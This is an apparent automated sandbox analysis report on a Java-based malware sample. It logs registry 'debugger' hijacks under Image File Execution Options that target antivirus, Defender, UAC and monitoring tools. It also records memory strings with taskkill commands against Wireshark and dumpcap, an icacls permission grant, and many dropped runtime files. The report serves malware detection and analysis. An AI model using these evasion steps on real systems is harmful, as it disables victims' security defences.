Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
